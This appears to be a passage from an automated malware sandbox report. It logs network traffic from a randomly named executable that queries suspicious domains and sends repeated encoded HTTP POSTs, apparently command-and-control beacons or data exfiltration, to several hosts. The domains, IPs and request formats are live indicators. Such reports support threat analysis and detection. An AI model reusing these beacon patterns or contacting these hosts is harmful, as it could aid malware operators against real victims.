                                            Jan 10, 2025 17:45:14.451137066 CET5001080192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:15.469611883 CET5001180192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:15.474509001 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:15.474642038 CET5001180192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:15.486999035 CET5001180192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:15.491929054 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:15.491946936 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:15.491972923 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:15.491986036 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:15.492008924 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:15.492019892 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:15.492034912 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:15.492089987 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:15.492104053 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:16.475223064 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:16.476088047 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:16.476128101 CET8050011104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:16.476145029 CET5001180192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:16.476200104 CET5001180192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:16.997899055 CET5001180192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:18.016839027 CET5001280192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:18.021933079 CET8050012104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:18.023339033 CET5001280192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:18.031637907 CET5001280192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:18.036442995 CET8050012104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:18.946753025 CET8050012104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:18.946773052 CET8050012104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:18.946952105 CET5001280192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:18.948493004 CET8050012104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:18.948563099 CET5001280192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:18.950109005 CET5001280192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:18.954870939 CET8050012104.21.80.1192.168.2.4

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 10, 2025 17:44:22.376305103 CET5101353192.168.2.41.1.1.1
                                            Jan 10, 2025 17:44:22.977864027 CET53510131.1.1.1192.168.2.4
                                            Jan 10, 2025 17:44:38.923894882 CET5976153192.168.2.41.1.1.1
                                            Jan 10, 2025 17:44:39.903786898 CET53597611.1.1.1192.168.2.4
                                            Jan 10, 2025 17:44:53.782757044 CET6088953192.168.2.41.1.1.1
                                            Jan 10, 2025 17:44:53.844286919 CET53608891.1.1.1192.168.2.4
                                            Jan 10, 2025 17:45:10.080867052 CET5905753192.168.2.41.1.1.1
                                            Jan 10, 2025 17:45:10.272468090 CET53590571.1.1.1192.168.2.4
                                            Jan 10, 2025 17:45:24.392380953 CET5468253192.168.2.41.1.1.1
                                            Jan 10, 2025 17:45:24.625715971 CET53546821.1.1.1192.168.2.4

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jan 10, 2025 17:44:22.376305103 CET192.168.2.41.1.1.10x833Standard query (0)www.wuyyv4tq.topA (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:44:38.923894882 CET192.168.2.41.1.1.10x148dStandard query (0)www.313333.xyzA (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:44:53.782757044 CET192.168.2.41.1.1.10xcd4cStandard query (0)www.mosquitoxp.lolA (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:45:10.080867052 CET192.168.2.41.1.1.10x79b0Standard query (0)www.mzkd6gp5.topA (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:45:24.392380953 CET192.168.2.41.1.1.10xdbfcStandard query (0)www.epayassist.netA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jan 10, 2025 17:44:22.977864027 CET1.1.1.1192.168.2.40x833No error (0)www.wuyyv4tq.top156.226.63.13A (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:44:39.903786898 CET1.1.1.1192.168.2.40x148dNo error (0)www.313333.xyz103.120.80.111A (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:44:53.844286919 CET1.1.1.1192.168.2.40xcd4cNo error (0)www.mosquitoxp.lol127.0.0.1A (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:45:10.272468090 CET1.1.1.1192.168.2.40x79b0No error (0)www.mzkd6gp5.top104.21.80.1A (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:45:10.272468090 CET1.1.1.1192.168.2.40x79b0No error (0)www.mzkd6gp5.top104.21.112.1A (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:45:10.272468090 CET1.1.1.1192.168.2.40x79b0No error (0)www.mzkd6gp5.top104.21.64.1A (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:45:10.272468090 CET1.1.1.1192.168.2.40x79b0No error (0)www.mzkd6gp5.top104.21.48.1A (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:45:10.272468090 CET1.1.1.1192.168.2.40x79b0No error (0)www.mzkd6gp5.top104.21.96.1A (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:45:10.272468090 CET1.1.1.1192.168.2.40x79b0No error (0)www.mzkd6gp5.top104.21.16.1A (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:45:10.272468090 CET1.1.1.1192.168.2.40x79b0No error (0)www.mzkd6gp5.top104.21.32.1A (IP address)IN (0x0001)false
                                            Jan 10, 2025 17:45:24.625715971 CET1.1.1.1192.168.2.40xdbfcNo error (0)www.epayassist.net208.91.197.27A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • www.wuyyv4tq.top
                                            • www.313333.xyz
                                            • www.mzkd6gp5.top

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449827156.226.63.13802056C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 10, 2025 17:44:22.998842955 CET533OUTGET /0qmw/?3fo=rJKpKBC&h0Z4uv=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.wuyyv4tq.top
                                            Connection: close
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Jan 10, 2025 17:44:23.870687962 CET691INHTTP/1.1 403 Forbidden
                                            Server: nginx
                                            Date: Fri, 10 Jan 2025 16:44:23 GMT
                                            Content-Type: text/html
                                            Content-Length: 548
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.449933103.120.80.111802056C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 10, 2025 17:44:40.060647011 CET796OUTPOST /5jna/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.313333.xyz
                                            Origin: http://www.313333.xyz
                                            Cache-Control: max-age=0
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Content-Length: 203
                                            Referer: http://www.313333.xyz/5jna/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Raw: 68 30 5a 34 75 76 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 67 4f 53 49 6c 75 68 39 54 4c 6d 59 49 4d 30 51 4f 54 6f 77 64 70 56 56 62 52 57 76 6c 33 6b 68 44 52 52 59 73 43 52 57 70 65 61 69 50 4c 61 76 78 47 61 38 4b 58 49 42 35 43 4a 69 37 44 43 6c 57 41 4e 68 35 35 62 67 74 4b 65 33 54 6f 48 77 44 57 56 66 32 79 78 44 46 79 46 49 34 61 58 56 52 73 4f 66 58 49 46 4f 4e 46 6b 4f 39 36 44 74 74 7a 76 70 36 59 70 59 6c 48 64 6c 59 61 52 44 74 63 6d 4a 42 70 74 76 6a 50 67 42 6a 68 37 76 63 55 58 4d 6a 6f 34 69 64 6c 63 6c 32 55 6a 61 6c 56 71 76 54 41 33 30 72 2f 37 7a 33 44 4b 64 65 6a 6a 58 70 67 3d 3d
                                            Data Ascii: h0Z4uv=l+uQF2GaIYZVgOSIluh9TLmYIM0QOTowdpVVbRWvl3khDRRYsCRWpeaiPLavxGa8KXIB5CJi7DClWANh55bgtKe3ToHwDWVf2yxDFyFI4aXVRsOfXIFONFkO96Dttzvp6YpYlHdlYaRDtcmJBptvjPgBjh7vcUXMjo4idlcl2UjalVqvTA30r/7z3DKdejjXpg==


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.449951103.120.80.111802056C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 10, 2025 17:44:42.770786047 CET816OUTPOST /5jna/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.313333.xyz
                                            Origin: http://www.313333.xyz
                                            Cache-Control: max-age=0
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Content-Length: 223
                                            Referer: http://www.313333.xyz/5jna/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Raw: 68 30 5a 34 75 76 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 68 75 43 49 6e 4f 64 39 44 62 6d 62 48 73 30 51 42 7a 6f 30 64 75 64 56 62 54 36 5a 6d 46 41 68 44 78 68 59 74 47 39 57 71 65 61 69 46 72 61 71 2b 6d 61 72 4b 58 46 30 35 48 68 69 37 44 47 6c 57 41 64 68 34 49 62 6a 74 61 65 35 61 49 48 79 4d 32 56 66 32 79 78 44 46 79 35 6d 34 63 2f 56 52 63 2b 66 55 71 68 52 45 6c 6b 4e 72 71 44 74 37 7a 76 74 36 59 70 32 6c 43 30 43 59 59 35 44 74 5a 61 4a 42 59 74 6f 74 2f 67 59 73 42 36 49 63 6b 2b 46 6a 4c 64 7a 62 48 38 58 2f 51 58 69 74 7a 6e 31 43 78 57 6a 35 2f 66 41 71 45 44 70 54 67 65 65 79 75 44 63 58 7a 66 72 4b 64 4a 61 64 54 6e 59 52 49 7a 57 35 38 45 3d
                                            Data Ascii: h0Z4uv=l+uQF2GaIYZVhuCInOd9DbmbHs0QBzo0dudVbT6ZmFAhDxhYtG9WqeaiFraq+marKXF05Hhi7DGlWAdh4Ibjtae5aIHyM2Vf2yxDFy5m4c/VRc+fUqhRElkNrqDt7zvt6Yp2lC0CYY5DtZaJBYtot/gYsB6Ick+FjLdzbH8X/QXitzn1CxWj5/fAqEDpTgeeyuDcXzfrKdJadTnYRIzW58E=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.449968103.120.80.111802056C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 10, 2025 17:44:45.331123114 CET10898OUTPOST /5jna/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.313333.xyz
                                            Origin: http://www.313333.xyz
                                            Cache-Control: max-age=0
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Content-Length: 10303
                                            Referer: http://www.313333.xyz/5jna/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Raw: 68 30 5a 34 75 76 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 68 75 43 49 6e 4f 64 39 44 62 6d 62 48 73 30 51 42 7a 6f 30 64 75 64 56 62 54 36 5a 6d 46 49 68 43 43 70 59 73 6e 39 57 72 65 61 69 47 72 61 72 2b 6d 62 70 4b 58 64 77 35 48 6c 59 37 41 75 6c 58 6a 6c 68 78 64 37 6a 69 61 65 35 59 49 48 2f 44 57 56 47 32 32 64 48 46 7a 56 6d 34 63 2f 56 52 65 57 66 41 6f 46 52 49 46 6b 4f 39 36 44 68 74 7a 76 46 36 59 77 4c 6c 43 77 34 59 6f 5a 44 74 39 47 4a 61 4f 52 6f 72 76 67 4e 6c 52 36 51 63 6b 69 47 6a 4c 42 2f 62 44 31 4b 2f 58 2f 69 76 43 58 6a 52 43 37 31 6c 64 37 6a 36 56 72 36 65 79 57 37 70 39 58 4a 51 52 66 69 56 66 49 32 5a 30 44 55 54 39 36 58 72 62 71 65 48 52 55 45 6b 65 65 49 4c 52 31 77 41 32 42 53 52 38 6f 63 55 58 78 54 6a 52 72 2b 6c 76 5a 6d 53 73 55 4b 69 6a 4a 45 46 71 61 47 4d 63 42 6f 6d 59 30 43 79 77 71 39 62 65 30 4d 63 4a 6c 4b 6b 70 4a 4e 38 2b 56 4e 79 43 4e 43 6d 6e 43 52 65 4d 67 46 72 41 4b 61 78 38 6e 49 6e 32 7a 6d 65 72 4a 54 6f 6a 45 30 64 69 70 66 44 30 4c 77 43 31 4c [TRUNCATED]
                                            Data Ascii: h0Z4uv=l+uQF2GaIYZVhuCInOd9DbmbHs0QBzo0dudVbT6ZmFIhCCpYsn9WreaiGrar+mbpKXdw5HlY7AulXjlhxd7jiae5YIH/DWVG22dHFzVm4c/VReWfAoFRIFkO96DhtzvF6YwLlCw4YoZDt9GJaORorvgNlR6QckiGjLB/bD1K/X/ivCXjRC71ld7j6Vr6eyW7p9XJQRfiVfI2Z0DUT96XrbqeHRUEkeeILR1wA2BSR8ocUXxTjRr+lvZmSsUKijJEFqaGMcBomY0Cywq9be0McJlKkpJN8+VNyCNCmnCReMgFrAKax8nIn2zmerJTojE0dipfD0LwC1LkFmonAvwYF394bntXZwxHC2eyeGm0mmUcOhpPF9+VYh56k86C7qv39VgEU9+Deir3D22szOVf5AzB2rzjsqa0HS0hUWXNPmeueRLhEUNqvpsfiyytgv16cj8vNcGIEpYxF+cSHXC1IY0yEvaw44+HB5ZMiJ4nry8MgT7tAOLmYfZ6qo2zZ2XFvhcuYAO7GxNo6rHGvl3abEXj2ZDmTjMyqBCkbqZ5OL2iUM0gJddJD81dEvntMHVWRMi4gATZ/BjLZwE8BQywjBr5ZeUIUDil9OMkD+UZM2YAjCnQZdcGZIb7rMWTzrnmyslnyz5vCfEXiBqxVd8YL0JhH5jN4sS7hHQuThugUxWD7uV4DWnnTORF8NkL3jGAm9Q2eCVK9NzZA7MKp86cw4nWGxrfWiZWjnHu3WSaZ2H+PCd1uANCKw7SjYW6kGC0PB0GeZvQjvspVQRRDyBb2Ma7geZlh/2icE37qYtdMwT1H1QuBeQlJpJ63s9A8kc/ScP/hdE1HxltfJkb59Bsg7A9CJWBafcS7exWGRWhNE/rmJFIley3It/9GJYSq0sraC03WTphnLfXi80a8mKiFFwc5y78HxoiobEKjqVwdcVyDLeXJNcadB48VBkR8Oz7Iq3atNdqZ2wYG/cdkqxsJJGUFN7F8bZepCQlq2d0xdkp7 [TRUNCATED]


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.449985103.120.80.111802056C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 10, 2025 17:44:47.872579098 CET531OUTGET /5jna/?h0Z4uv=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&3fo=rJKpKBC HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.313333.xyz
                                            Connection: close
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Jan 10, 2025 17:44:48.763370991 CET1236INHTTP/1.1 200 OK
                                            Server: wts/1.7.0
                                            Date: Fri, 10 Jan 2025 16:45:46 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            ETag: "65517fce-1a10"
                                            Data Raw: 31 61 31 61 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 33 31 33 33 33 33 2e 78 79 7a 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 33 31 33 33 33 33 2e 78 79 7a 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                            Data Ascii: 1a1a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>313333.xyz-(www.west.cn)</title> <meta name="description" content="313333.xyz," /> <meta name="keywords" content="313333.xyz," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } [TRUNCATED]
                                            Jan 10, 2025 17:44:48.763396025 CET224INData Raw: 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 20 20 68 31
                                            Data Ascii: height: 100%; } html, body, h1, h2, h3, h4, h5, h6, hr, p, iframe, dl, dt,
                                            Jan 10, 2025 17:44:48.763413906 CET1236INData Raw: 20 20 64 64 2c 0d 0a 20 20 20 20 20 20 20 20 75 6c 2c 0d 0a 20 20 20 20 20 20 20 20 6f 6c 2c 0d 0a 20 20 20 20 20 20 20 20 6c 69 2c 0d 0a 20 20 20 20 20 20 20 20 70 72 65 2c 0d 0a 20 20 20 20 20 20 20 20 66 6f 72 6d 2c 0d 0a 20 20 20 20 20 20 20
                                            Data Ascii: dd, ul, ol, li, pre, form, button, input, textarea, th, td, fieldset { margin: 0; padding: 0; }
                                            Jan 10, 2025 17:44:48.763545036 CET224INData Raw: 3a 20 23 66 65 66 66 30 37 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70
                                            Data Ascii: : #feff07; font-family: Tahoma, sans-serif; padding: 60px 0 20px 0 } .banner1 p { color: #fff; font-size: 20px; } .d
                                            Jan 10, 2025 17:44:48.763644934 CET1236INData Raw: 6f 6d 61 69 6e 2d 63 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 35 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20
                                            Data Ascii: omain-con { padding: 20px 50px; position: relative; } .left { background: #f6f6f6 url(http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg) no-repeat left top;
                                            Jan 10, 2025 17:44:48.763731003 CET1236INData Raw: 65 69 67 68 74 3a 20 35 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 35 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20
                                            Data Ascii: eight: 56px; line-height: 56px; font-size: 20px; text-align: center } .imgpic { padding: 25px 0 20px 0 } .contact { margin
                                            Jan 10, 2025 17:44:48.763757944 CET1236INData Raw: 2f 79 6b 6a 2f 76 69 65 77 2e 61 73 70 3f 64 6f 6d 61 69 6e 3d 33 31 33 33 33 33 2e 78 79 7a 22 20 63 6c 61 73 73 3d 22 6f 72 61 6e 67 65 62 74 6e 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e c1 a2 bc b4 b9 ba c2 f2 a3 a8 42 75 79 20 69
                                            Data Ascii: /ykj/view.asp?domain=313333.xyz" class="orangebtn" target="_blank">Buy it !</a></p> </div> </div> <div class="main-out "> <div class="wrap "> <div class="footer-link" id="J_footerLink">
                                            Jan 10, 2025 17:44:48.763792038 CET260INData Raw: 69 70 74 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 33 35 32 62 66 30 66 62 31 36 35 63 61 37 61 62 36 33 34 64 33 63 65 61 38
                                            Data Ascii: ipt"); hm.src = "https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script></body>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.450009104.21.80.1802056C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 10, 2025 17:45:10.391254902 CET802OUTPOST /0hqe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.mzkd6gp5.top
                                            Origin: http://www.mzkd6gp5.top
                                            Cache-Control: max-age=0
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Content-Length: 203
                                            Referer: http://www.mzkd6gp5.top/0hqe/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Raw: 68 30 5a 34 75 76 3d 4f 49 6f 56 68 6a 7a 55 67 6f 38 33 77 49 53 4d 44 39 64 61 65 77 52 30 39 7a 4a 75 70 31 78 50 55 6c 70 72 77 36 57 31 70 72 74 58 6e 59 54 50 72 4c 33 52 67 31 69 51 38 38 66 73 30 31 67 64 73 30 76 44 4b 6f 6f 64 59 6d 6a 4e 4e 44 50 36 67 45 61 52 71 51 64 65 62 43 74 39 30 69 48 6a 56 59 42 69 6a 6d 61 44 63 6f 6d 4a 71 61 6c 31 63 64 56 58 43 77 65 54 70 63 72 46 34 73 4b 4c 63 78 69 52 77 74 59 6d 30 4d 55 6d 34 30 48 51 79 62 68 6e 7a 72 38 38 78 2b 6b 2b 50 58 42 75 73 46 64 47 77 34 33 59 35 58 53 69 6d 57 61 47 52 30 47 31 30 32 79 59 78 6d 2f 68 44 51 65 6e 71 51 3d 3d
                                            Data Ascii: h0Z4uv=OIoVhjzUgo83wISMD9daewR09zJup1xPUlprw6W1prtXnYTPrL3Rg1iQ88fs01gds0vDKoodYmjNNDP6gEaRqQdebCt90iHjVYBijmaDcomJqal1cdVXCweTpcrF4sKLcxiRwtYm0MUm40HQybhnzr88x+k+PXBusFdGw43Y5XSimWaGR0G102yYxm/hDQenqQ==
                                            Jan 10, 2025 17:45:11.258136034 CET968INHTTP/1.1 404 Not Found
                                            Date: Fri, 10 Jan 2025 16:45:11 GMT
